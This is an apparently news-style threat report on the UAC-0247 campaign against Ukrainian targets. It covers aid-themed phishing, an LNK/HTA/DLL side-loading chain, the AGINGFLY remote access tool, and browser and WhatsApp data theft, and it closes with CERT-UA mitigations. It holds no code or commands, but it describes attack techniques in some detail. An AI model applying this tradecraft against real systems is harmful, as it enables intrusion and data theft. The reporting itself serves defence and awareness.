New UAC-0247 Campaign Steals Browser and WhatsApp Data From

A threat cluster identified as UAC-0247 has been actively campaigning since early 2026. This operation, detailed in a <a href="https://ppl-ai-file-upload.s3.amazonaws.com/web/direct-files/attachments/11146061/afd78249

The attackers are not only stealing sensitive data from internet browsers and WhatsApp but are also moving quietly through compromised networks to expand their reach.

The campaign begins with a simple but deceptive email. The attacker reaches out to the target under the cover of a humanitarian aid discussion, asking the recipient to click on a link.

To make the email look convincing, the attacker either builds a fake website using artificial intelligence tools or redirects the victim to a legitimate third-party site that carries a Cross-Site Scripting (XSS) vulnerability. Once the victim clicks the link, an archive file downloads to their computer.

Opening the archive triggers a shortcut file that activates the standard HTA file processing tool, which then pulls and runs a remote HTA file. This decoy form keeps the victim distracted while a background process drops and launches an executable file through a scheduled task.

CERT-UA analysts identified and documented this activity as part of an intensified wave of cyberattacks recorded during March and April 2026, noting that the same cluster has also targeted representatives of Ukraine’s Defense Forces and FPV drone operators.

In one confirmed case from March 10, 2026, an archive named “bachu.zip” was distributed through the Signal messenger, posing as an updated version of the “BACHU” software tool used by FPV operators.

Inside, the archive carried a DLL file that launched the AGINGFLY malware through a DLL side-loading technique the moment the main executable ran.

Among all the tools deployed in this campaign, the study of a dozen cyber incidents revealed a consistent pattern of data theft and network reconnaissance.

Attackers used CHROMELEVATOR to pull authentication data and other stored credentials from internet browsers, while a separate tool called ZAPIXDESK was used specifically to steal data from the WhatsApp messenger application.

Alongside the theft tools, the attackers used basic subnet scanners and the publicly available RUSTSCAN tool to map out internal networks.

In some cases, the LIGOLO-NG and CHISEL tools were deployed to build hidden network tunnels, and one incident even revealed the use of the XMRIG miner, packaged as a DLL and loaded through a patched version of the legitimate WIREGUARD program.

Inside the AGINGFLY Malware

The core remote access tool used across this campaign is AGINGFLY, written in the C# programming language. It provides the attacker with a full set of remote control capabilities, including command execution, file downloading, screenshot capture, keylogger activation, and in-memory code execution.

What makes AGINGFLY stand out from similar tools is that its command handlers are not built into the malware itself.

Instead, they are downloaded from the command-and-control (C2) server as source code and compiled on the fly inside the infected system.

Communication with the C2 server runs through web sockets, and all traffic is encrypted using the AES-CBC algorithm with a static key.

To maintain a persistent foothold, the campaign also uses a PowerShell script named SILENTLOOP, which automatically runs commands, updates its configuration, and retrieves the latest C2 server IP address from a Telegram channel.

If the primary Telegram source fails, SILENTLOOP also supports backup mechanisms to find the C2 address.

The initial access stage uses either a TCP reverse shell or RAVENSHELL, which establishes an encrypted TCP connection using a 9-byte XOR key and communicates with the management server through CMD.

CERT-UA recommends that organizations reduce their exposure by restricting the execution of LNK, HTA, and JS files on endpoint systems. Administrators should also limit the use of legitimate utilities such as mshta.exe, powershell.exe, and wscript.exe, which this campaign actively abuses.

These restrictions align with standard attack surface reduction practices built into the operating system and do not require third-party tools to implement.

Disclaimer: HackersRadar reports on cybersecurity threats and incidents for informational and awareness purposes only. We do not engage in hacking activities, data exfiltration, or the hosting or distribution of stolen or leaked information. All content is based on publicly available sources.